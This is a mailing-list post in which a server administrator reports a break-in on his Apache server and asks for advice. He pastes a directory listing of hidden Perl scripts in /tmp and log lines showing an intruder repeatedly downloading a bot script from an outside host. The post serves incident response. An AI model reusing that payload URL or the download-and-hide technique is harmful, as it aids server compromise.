-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Here's what I found out more digging in the logs.
There are 3 hidden files (attached with this message) in /tmp/:
1) .fuhrer
2) .fuhrer2
3) .fuhrer3
ns1:/var/log/apache2# ls -la /tmp/
total 56
drwxrwxrwt 5 root root 4096 Nov 25 07:46 .
drwxr-xr-x 26 root root 4096 Nov 25 04:49 ..
drwxrwxrwt 2 root root 4096 Nov 21 23:32 .ICE-unix
drwxrwxrwt 2 root root 4096 Nov 21 23:32 .X11-unix
- -rw-r--r-- 1 www-data www-data 3673 Nov 25 00:30 .fuhrer
- -rw-r--r-- 1 www-data www-data 18698 Nov 25 06:11 .fuhrer2
- -rw-r--r-- 1 www-data www-data 0 Nov 25 08:10 .fuhrer3
- -rw------- 1 www-data www-data 71 Nov 23 03:28
sess_07f541a848d0dd70fc87c3aed1691c87
- -rw------- 1 www-data www-data 864 Nov 23 01:55
sess_8092654d49176bb860dca7fad5f50cce
- -rw------- 1 www-data www-data 342 Nov 22 23:56
sess_e5e56ebacf7fcd31ea42d829e1f1f4fd
drwxrwxrwx 3 www-data www-data 4096 Nov 23 01:28 yappa-ng_cache
All these 3 are perl scripts, so now it is clear that there are the perl
scripts which are running from within apache (I've enabled mod_perl in my
apache installation) and eating up the cpu cycles.
Now let's look a little of /var/log/apache2/error.log:
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 210.37
KB/s
08:07:40 (210.37 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]
- --08:07:40-- http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
=> `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 211.06
KB/s
08:07:40 (211.06 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]
- --08:07:40-- http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
=> `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 210.52
KB/s
The logs show that the guy uploaded the files to /tmp and hid them.
In my first mail, the logs showed a lot of "sh" defunct processes executed
from within apache. Is this an attempt to gain the shell through the web
server ?
Please suggest me what more should I look for and how to tackle this attack.
Regards,
rrs
- --
Ritesh Raj Sarraf
RESEARCHUT -- http://www.researchut.com
Gnupg Key ID: 04F130BC
"Stealing logic from one person is plagiarism, stealing from many is
research."
"Necessity is the mother of invention."
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFDhz8y4Rhi6gTxMLwRAsb5AJ9PMOO4Li7q8dhoegI6YO1hbWiMBwCfTZGc
AP6aL+fWRvuc7fHlgc94EZw=
=TkF/
-----END PGP SIGNATURE-----
-------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems? Stop! Download the new AJAX search engine that makes
searching your log files as easy as surfing the web. DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click
_______________________________________________
linux-india-help mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/linux-india-help
